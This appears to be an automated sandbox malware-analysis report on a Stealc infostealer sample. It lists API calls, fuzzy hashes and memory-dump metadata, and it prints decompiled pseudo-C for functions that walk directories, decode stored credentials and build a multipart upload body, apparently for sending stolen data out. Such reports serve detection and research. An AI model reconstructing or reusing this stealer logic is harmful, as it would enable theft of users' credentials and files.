0x00178ef0
0x00178e9e
0x00178e9f
0x00178ea5
0x00178eaa
0x00178eab
0x00178eb5
0x00178eb7
0x00178eb7
0x00178eb8
0x00178ebb
0x00178ec4
0x00178ec8
0x00178ecc
0x00178ecc
0x00178e9f
0x0017913f
0x00179143
0x00179149
0x0017914f
0x00179152
0x00179155
0x00179157
0x00000000
0x0017915f

APIs

strtok_s.MSVCRT ref: 00178E42
lstrcpy.KERNEL32(?,00000000), ref: 00178F64
lstrcpy.KERNEL32(?,00000000), ref: 00178F92
lstrcpy.KERNEL32(?,00000000), ref: 00178FC8
lstrcpy.KERNEL32(?,00000000), ref: 00178FFE
lstrcpy.KERNEL32(?,00000000), ref: 00179034
lstrcpy.KERNEL32(?,00000000), ref: 0017906A
lstrcpy.KERNEL32(?,00000000), ref: 001790A0

Part of subcall function 0017DBC6: lstrlen.KERNEL32(00000010,?,?,?,00178F87,00000000,00000010), ref: 0017DBFC

lstrcpy.KERNEL32(?,00000000), ref: 001790D6
lstrcpy.KERNEL32(?,00000000), ref: 0017910C
strtok_s.MSVCRT ref: 00179149

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID:
API String ID: 2116072422-0
Opcode ID: 73fb1e313353f40e4dfe45839b3c5abea17c1b4a8a715c0cb3296a560b159133
Instruction ID: efe892230fdba8444d3cebffb23908c60fc9236805f28b3f80c995534b533090
Opcode Fuzzy Hash: 73fb1e313353f40e4dfe45839b3c5abea17c1b4a8a715c0cb3296a560b159133
Instruction Fuzzy Hash: 6AA14776900219ABDF01EF64DC49ACEB7BCFF18700F4481A6E90DE7261EB319A598F51

Uniqueness

Uniqueness Score: -1.00%

Function 0017B8B3 Relevance: 15.1, APIs: 10, Instructions: 137stringmemoryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(000000FF,?), ref: 0017B916
lstrcat.KERNEL32(000000FF,00181F64), ref: 0017B924
GetProcessHeap.KERNEL32(00000008,00000400), ref: 0017B955
RtlAllocateHeap.NTDLL(00000000), ref: 0017B95C
lstrcpy.KERNEL32(?,0017FBD9), ref: 0017B9B7
GetProcessHeap.KERNEL32(00000000,0017FBD9), ref: 0017B9BF
lstrcat.KERNEL32(000000FF,?), ref: 0017B9D6
lstrcpy.KERNEL32(?,0017FBD9), ref: 0017B9E8
lstrcat.KERNEL32(000000FF,?), ref: 0017BA10
lstrcat.KERNEL32(000000FF,00181EBC), ref: 0017BA1E

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$Processlstrcpy$Allocate
String ID:
API String ID: 2428395069-0
Opcode ID: a6e273245f89e71d9226b4403263926882155b9031ccabad0fc1cb0dcbdc0a54
Instruction ID: 35674dd5f8ba3c3a1d5987655eb1a3ab9561529344166238cca528b1b5818bf4
Opcode Fuzzy Hash: a6e273245f89e71d9226b4403263926882155b9031ccabad0fc1cb0dcbdc0a54
Instruction Fuzzy Hash: 125195F2900219BFDB129FA4DD88EEE7BBCEB48745F0044A5F606E2160D7359B459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0017B0EF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0017B102
RtlAllocateHeap.NTDLL(00000000), ref: 0017B109
lstrcat.KERNEL32(?), ref: 0017B207
lstrcat.KERNEL32(?), ref: 0017B21A
lstrlen.KERNEL32(0017B3E2), ref: 0017B223
lstrlen.KERNEL32(0017B3E2), ref: 0017B230

Part of subcall function 0017AEC6: memset.MSVCRT ref: 0017AEE8
Part of subcall function 0017AEC6: memset.MSVCRT ref: 0017AEF6
Part of subcall function 0017AEC6: lstrcat.KERNEL32(?,00000000), ref: 0017AF15
Part of subcall function 0017AEC6: lstrcat.KERNEL32(?), ref: 0017AF30
Part of subcall function 0017AEC6: lstrcat.KERNEL32(?,?), ref: 0017AF44
Part of subcall function 0017AEC6: lstrcat.KERNEL32(?), ref: 0017AF57

Strings

%s\%s, xrefs: 0017B185
%s\*, xrefs: 0017B11B

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlenmemset$AllocateProcess
String ID: %s\%s$%s\*
API String ID: 949609408-2848263008
Opcode ID: efc9e6106e8191355f62eb12250d10e056b6cb7c7950d71d1d46bbf604c335b3
Instruction ID: d83b96d2b1c5859efc0531eae012e12846ec3b6b2f3a67fb303436511e2f3460
Opcode Fuzzy Hash: efc9e6106e8191355f62eb12250d10e056b6cb7c7950d71d1d46bbf604c335b3
Instruction Fuzzy Hash: C641FCB1900219BBCF11ABA4DC49ADEBBBCEF48705F0445E1F619E3260EB359B558F50

Uniqueness

Uniqueness Score: -1.00%

Function 0017A769 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 211stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 0017A7E6
lstrcat.KERNEL32(?,?), ref: 0017A8B8
lstrlen.KERNEL32(?), ref: 0017A8C5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0017A95F

Strings

%s\%s\%s, xrefs: 0017A8FD
%s\%s, xrefs: 0017A82A, 0017A835, 0017A911
%s\*, xrefs: 0017A77E

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$Unothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s\%s$%s\*
API String ID: 745573756-1426491737
Opcode ID: 0750a5a7b6532ee65deafb5ac03086b3dd8f1723ce21e1a02370c4848ccad2ce
Instruction ID: 0686d5f22dcc0152b4441b3047f62d6d09f8594209c90344e0d46db04c9024d7
Opcode Fuzzy Hash: 0750a5a7b6532ee65deafb5ac03086b3dd8f1723ce21e1a02370c4848ccad2ce
Instruction Fuzzy Hash: 298117B290021DABCF11AFA4CD88ADE7BBCAF08314F4444A5F909A3250EB35DB95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0017AEC6 Relevance: 11.4, APIs: 9, Instructions: 165
stringCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0017AEC6(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v40;
				void _v308;
				void _v572;
				char _v1572;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t66;
				void* _t80;
				void* _t94;
				void* _t96;
				void* _t98;
				char _t99;
				char _t101;
				intOrPtr* _t108;
				void* _t125;
				void* _t132;
				void* _t156;
				void* _t157;
				void* _t160;
				void* _t161;
				void* _t165;
				void* _t167;
				void* _t168;

				_t168 = __eflags;
				memset( &_v572, 0, 0x104);
				memset( &_v308, 0, 0x104);
				_v12 = 0;
				_v16 = 0;
				_t66 = E0017D8C9( &_v40, 0x1a);
				_pop(_t125);
				 *0x383730( &_v572,  *_t66);
				E00171839(_v40);
				 *0x383730( &_v572,  *0x383248);
				 *0x383730( &_v308,  &_v572);
				 *0x383730( *0x3834d8);
				_t160 = _t157 + 0x18 - 0xc;
				E0017E990(_t160, _t168,  &_v308);
				_t80 = E0017D89F( &_v308);
				_t161 = _t160 + 0xc;
				_t169 = _t80;
				if(_t80 != 0) {
					_t94 = E00174D0F(_t169,  &_v308,  &_v12,  &_v16);
					_t161 = _t161 + 0xc;
					_t170 = _t94;
					if(_t94 != 0) {
						_t165 = _t161 - 0xc;
						E0017E990(_t165, _t170, _a4);
						_t96 = E00174B85( &_v24,  &_v28);
						_t161 = _t165 + 0xc;
						if(_t96 != 0) {
							_t98 = E0017DC73(_v28, _t125, _v24);
							_pop(_t132);
							_t156 = _t98;
							_t99 =  *0x3835f4(_t156,  *0x383040);
							_v8 = _t99;
							if(_t99 != 0) {
								_t101 = _t99 + 0xc;
								_v8 = _t101;
								 *((char*)(_t101 + 0x8c)) = 0;
								if(E00174C21( &_v20, _t132,  &_v24, _v8) != 0) {
									_v28 =  &_v1572;
									memset(_v28, 0, 0x3e8 << 0);
									_t108 = E00174E50(_v24,  &_v40, _v20, _v12, _v16);
									_t167 = _t161 + 0x1c;
									 *0x383730( &_v1572,  *_t108);
									E00171839(_v40);
									_push(0x17fbd9);
									_push( &_v1572);
									if( *0x383754() != 0) {
										_push( &_v1572);
									} else {
										_push(_v8);
									}
									 *0x383730(_a8);
									 *0x383730(_a8, "\n");
									_v20 =  &_v1572;
									memset(_v20, 0, 0x3e8 << 0);
									_t161 = _t167 + 0xc;
								}
							}
							 *0x383774(_t156);
						}
					}
				}
				E00174C7A( &_v16,  &_v12);
				_v20 =  &_v572;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v308;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v8;
				return memset(_v20, 0, 4 << 0);
			}

0x0017aec6
0x0017aee8
0x0017aef6
0x0017af00
0x0017af03
0x0017af06
0x0017af0b
0x0017af15
0x0017af1e
0x0017af30
0x0017af44
0x0017af57
0x0017af5d
0x0017af69
0x0017af6e
0x0017af73
0x0017af76
0x0017af78
0x0017af8d
0x0017af92
0x0017af95
0x0017af97
0x0017af9d
0x0017afa5
0x0017afb0
0x0017afb5
0x0017afba
0x0017afc6
0x0017afcb
0x0017afd2
0x0017afd5
0x0017afdb
0x0017afe0
0x0017afe6
0x0017afe9
0x0017afec
0x0017b004
0x0017b010
0x0017b01d
0x0017b02f
0x0017b034
0x0017b040
0x0017b049
0x0017b04e
0x0017b059
0x0017b062
0x0017b06f
0x0017b064
0x0017b064
0x0017b064
0x0017b073
0x0017b081
0x0017b08d
0x0017b09a
0x0017b09a
0x0017b09a
0x0017b004
0x0017b09d
0x0017b09d
0x0017afba
0x0017af97
0x0017b0a9
0x0017b0b4
0x0017b0c1
0x0017b0c9
0x0017b0d6
0x0017b0db
0x0017b0ee

APIs

memset.MSVCRT ref: 0017AEE8
memset.MSVCRT ref: 0017AEF6
lstrcat.KERNEL32(?,00000000), ref: 0017AF15
lstrcat.KERNEL32(?), ref: 0017AF30
lstrcat.KERNEL32(?,?), ref: 0017AF44
lstrcat.KERNEL32(?), ref: 0017AF57

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 00174D0F: memcmp.MSVCRT ref: 00174DC5

Part of subcall function 00174B85: CloseHandle.KERNEL32(00177CCB,?,?,?,00177CCB,?), ref: 00174C0D

Part of subcall function 00174C21: CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C39
Part of subcall function 00174C21: CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C5D

Part of subcall function 00174E50: memcmp.MSVCRT ref: 00174E6E
Part of subcall function 00174E50: memset.MSVCRT ref: 00174EA0

lstrcat.KERNEL32(?,00000000), ref: 0017B040
lstrcat.KERNEL32(0017B1B9,?), ref: 0017B073
lstrcat.KERNEL32(0017B1B9,00181EBC), ref: 0017B081

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
String ID:
API String ID: 2430198047-0
Opcode ID: 5ee5a8d2b9800693eb7aeddb81216673f18746498a67a9bdd48fb060e2bbb125
Instruction ID: 6d11127c0f1f22936aef080a3f43d60ec0afe91f316e732eac9a8fb89cb05220
Opcode Fuzzy Hash: 5ee5a8d2b9800693eb7aeddb81216673f18746498a67a9bdd48fb060e2bbb125
Instruction Fuzzy Hash: 0C51F9B6D0021DABCF11EBA4DC45ADEBBB9FF48304F1444A5E909A3261EB319B548F51

Uniqueness

Uniqueness Score: -1.00%

Function 0017B446 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?), ref: 0017B556
lstrcat.KERNEL32(?,0017FBDC), ref: 0017B569
lstrcat.KERNEL32(?,?), ref: 0017B579
lstrcat.KERNEL32(?,0017FBDC), ref: 0017B587
lstrcat.KERNEL32(?,?), ref: 0017B59B

Strings

%s\%s, xrefs: 0017B4C8, 0017B4D3, 0017B511
%s\*, xrefs: 0017B45B

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: %s\%s$%s\*
API String ID: 4038537762-2848263008
Opcode ID: c9acbf3e54fa8cd65a8b3c423b2d5367f68d1b254fa9e1dcaee3ab3e032a081c
Instruction ID: 9c2e76a3fd5f4125bd6bba702dc7f29b3eddae4c3edcc3b1bb4de6ba4f1449d2
Opcode Fuzzy Hash: c9acbf3e54fa8cd65a8b3c423b2d5367f68d1b254fa9e1dcaee3ab3e032a081c
Instruction Fuzzy Hash: 4651F9B290421DABCF11AFA4DD89ADA7B7CFF04700F4444A5B909E2250EB35DB59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0017AB6F Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 132stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?), ref: 0017AC21
lstrcat.KERNEL32(?), ref: 0017AC34
lstrcat.KERNEL32(?,?), ref: 0017AC48
lstrcat.KERNEL32(?,0017AE1B), ref: 0017AC58
lstrcat.KERNEL32(?,0017FBDC), ref: 0017AC6A
lstrcat.KERNEL32(?,?), ref: 0017AC7E

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 00174B85: CloseHandle.KERNEL32(00177CCB,?,?,?,00177CCB,?), ref: 00174C0D

Part of subcall function 00173786: lstrlen.KERNEL32(?), ref: 001737DF

Strings

%s\%s, xrefs: 0017AB87

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseHandlelstrcpylstrlen
String ID: %s\%s
API String ID: 460287509-4073750446
Opcode ID: 8842c33391683092347dcee469b460c1c21cec476e97a25bdf3d35227b6d47c4
Instruction ID: d6fdc401c71f71d3a5b2fd7c56e1053aab6f69d527695a57bb8f55ad5c585d8b
Opcode Fuzzy Hash: 8842c33391683092347dcee469b460c1c21cec476e97a25bdf3d35227b6d47c4
Instruction Fuzzy Hash: 4B510BB190021DABCF51DBA4CC88ADE7BBCFF48710F4444A5A609E3250EB349B99CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0017B2B5 Relevance: 8.9, APIs: 7, Instructions: 115
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0017B2B5(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				char _v548;
				char _v812;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t64;
				void* _t84;
				void* _t110;
				void* _t138;
				void* _t143;
				void* _t144;
				void* _t149;
				void* _t150;

				_t150 = __eflags;
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				 *0x383730( &_v1076,  *0x383248);
				_t64 = E0017D8C9( &_v20, 0x1a);
				_pop(_t110);
				 *0x383730( &_v284,  *_t64);
				E00171839(_v20);
				 *0x383730( &_v284,  &_v1076);
				 *0x383730( &_v548,  &_v284);
				 *0x383730( &_v548,  *0x3831c8);
				 *0x383730( &_v812,  &_v284);
				 *0x383730( *0x383208);
				_t143 = _t138 + 0x30 - 0xc;
				E0017E990(_t143, _t150,  &_v548);
				_t84 = E0017D89F( &_v812);
				_t144 = _t143 + 0xc;
				if(_t84 != 0) {
					_t149 = _t144 - 0x50;
					E001716CB( &_a4, _t149);
					_push( &_v812);
					E0017B0EF(_t110);
					_t144 = _t149 + 0x54;
				}
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v1076;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v548;
				memset(_v8, 0, 0x104 << 0);
				_v8 =  &_v812;
				memset(_v8, 0, 0x104 << 0);
				return E001716AC( &_a4);
			}

0x0017b2b5
0x0017b2c7
0x0017b2d4
0x0017b2dc
0x0017b2e9
0x0017b2f1
0x0017b2fe
0x0017b306
0x0017b313
0x0017b322
0x0017b32d
0x0017b332
0x0017b33c
0x0017b345
0x0017b358
0x0017b36c
0x0017b37f
0x0017b393
0x0017b3a6
0x0017b3ac
0x0017b3b8
0x0017b3bd
0x0017b3c2
0x0017b3c7
0x0017b3c9
0x0017b3d1
0x0017b3dc
0x0017b3dd
0x0017b3e2
0x0017b3e2
0x0017b3eb
0x0017b3f8
0x0017b400
0x0017b40d
0x0017b415
0x0017b422
0x0017b42a
0x0017b437
0x0017b445

APIs

lstrcat.KERNEL32(?), ref: 0017B322
lstrcat.KERNEL32(?,00000000), ref: 0017B33C
lstrcat.KERNEL32(?,?), ref: 0017B358
lstrcat.KERNEL32(?,?), ref: 0017B36C
lstrcat.KERNEL32(?), ref: 0017B37F
lstrcat.KERNEL32(?,?), ref: 0017B393
lstrcat.KERNEL32(?), ref: 0017B3A6

Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6

Part of subcall function 0017B0EF: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0017B102
Part of subcall function 0017B0EF: RtlAllocateHeap.NTDLL(00000000), ref: 0017B109
Part of subcall function 0017B0EF: lstrcat.KERNEL32(?), ref: 0017B207
Part of subcall function 0017B0EF: lstrcat.KERNEL32(?), ref: 0017B21A
Part of subcall function 0017B0EF: lstrlen.KERNEL32(0017B3E2), ref: 0017B223
Part of subcall function 0017B0EF: lstrlen.KERNEL32(0017B3E2), ref: 0017B230

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpy
String ID:
API String ID: 3953687974-0
Opcode ID: 668e86b2b743a1fddc3b89373594ef306fa6556019a3b5e30657d881a72425f5
Instruction ID: 8ae2f0348cee3a8c0c2c19288a0f263d131ae6a686bf79e872790b1afe17083b
Opcode Fuzzy Hash: 668e86b2b743a1fddc3b89373594ef306fa6556019a3b5e30657d881a72425f5
Instruction Fuzzy Hash: 8D41E6B291021CABCB51DBA4D999ADDB7FDFB48310F5444E5E609E3250EB30AF859F40

Uniqueness

Uniqueness Score: -1.00%

Function 0017D0BE Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,0017FBD9), ref: 0017D155
RtlAllocateHeap.NTDLL(00000000), ref: 0017D15C

Strings

:\, xrefs: 0017D106
QuBi, xrefs: 0017D11E
C, xrefs: 0017D0E8

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID: :\$C$QuBi
API String ID: 1357844191-239756005
Opcode ID: 120bbbd10ede9a0dee49cb47d196aa686d9d7b49fe9923555114b8b3c06cd587
Instruction ID: ceeaaaa66157e99d66d265a645ec920c8ad1af6a6b26fd709883e438b5b70380
Opcode Fuzzy Hash: 120bbbd10ede9a0dee49cb47d196aa686d9d7b49fe9923555114b8b3c06cd587
Instruction Fuzzy Hash: 9D2162B2A0420DBEDB119FB89E859AEBEBCEF5D744F4041A9F145E2211E334CB418761

Uniqueness

Uniqueness Score: -1.00%

Function 0017916B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0017918B
strtok_s.MSVCRT ref: 0017919C

Strings

block, xrefs: 00179174

Memory Dump Source

Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170000_stealc.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 14ecf174fe190994b2502b8f3a308079cbf9598caeaccd5c39132efff469d560
Instruction ID: 4aeaf86d33ab1e0bdf31db73225497ffc10fa7b08919a6a3ed636cb67b77445a
Opcode Fuzzy Hash: 14ecf174fe190994b2502b8f3a308079cbf9598caeaccd5c39132efff469d560
Instruction Fuzzy Hash: BC311AB1648204BBDB64BFA1DD48E5A7BBCEF80745F108099FC09DA156E778C6888B51

Uniqueness

Uniqueness Score: -1.00%

Function 00173170 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 379
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00173170(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a32) {
				char _v16;
				char _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				char _v68;
				intOrPtr _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				intOrPtr _v136;
				intOrPtr _v156;
				intOrPtr _v164;
				intOrPtr _v176;
				void _v180;
				char _v240;
				char _v2240;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t174;
				intOrPtr _t181;
				void* _t185;
				void* _t213;
				void* _t254;
				signed int _t259;
				void* _t346;
				signed int _t351;
				signed int _t363;
				signed int _t365;
				void* _t367;
				void* _t454;
				void* _t455;

				_t461 = __eflags;
				E0017E9C2( &_a8, __ecx, _t455 - 0xc, __eflags);
				_t174 = E001730F8();
				_t365 = 0xf;
				memcpy( &_v180, _t174, _t365 << 2);
				E0017E990(_a4, _t461, 0x17fbd9);
				E0017E990( &_v96, _t461, 0x17fbd9);
				E0017E990( &_v16, _t461, 0x17fbd9);
				E0017E990( &_v68, _t461, 0x17fbd9);
				E0017E990( &_v108, _t461, 0x17fbd9);
				_t181 =  *0x383694(0, 1, 0, 0, 0,  &_v240);
				_push( *0x3833a4);
				_v72 = _t181;
				_push(_v176);
				_v32 = 0;
				if( *0x383754() == 0) {
					_v32 = 1;
				}
				_t463 = _v72;
				if(_v72 != 0) {
					_t213 = E0017D78F(0x17fbd9,  &_v56, _t463, 0x14);
					_pop(0);
					E0017EA2F(E0017EA69( &_v96, 0, _t213,  &_v84, _t463), 0,  &_v96);
					E00171839(_v84);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "------"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EA69( &_v68, 0,  &_v96,  &_v56, _t463), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "--"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E00171839(_v56);
					E0017EA2F(E0017EA69(E0017EAAB( &_v108, 0,  &_v28, _t463,  *0x38306c), 0,  &_v96,  &_v84, _t463), 0,  &_v108);
					E00171839(_v84);
					E00171839(_v28);
					_t254 =  *0x383778(_v72, _v164, _v156, 0, 0, 3, 0, 0);
					_v36 = _t254;
					if(_t254 != 0) {
						asm("sbb eax, eax");
						_t259 =  *0x3837a8(_v36,  *0x3833c0, _v136,  *0x3831f8, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
						_v32 = _t259;
						_t465 = _t259;
						if(_t259 != 0) {
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EA69( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t465,  *0x38322c), 0,  &_v16);
							E00171839(_v56);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465,  *0x383380), 0,  &_v16);
							E00171839(_v28);
							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E00171839(_v28);
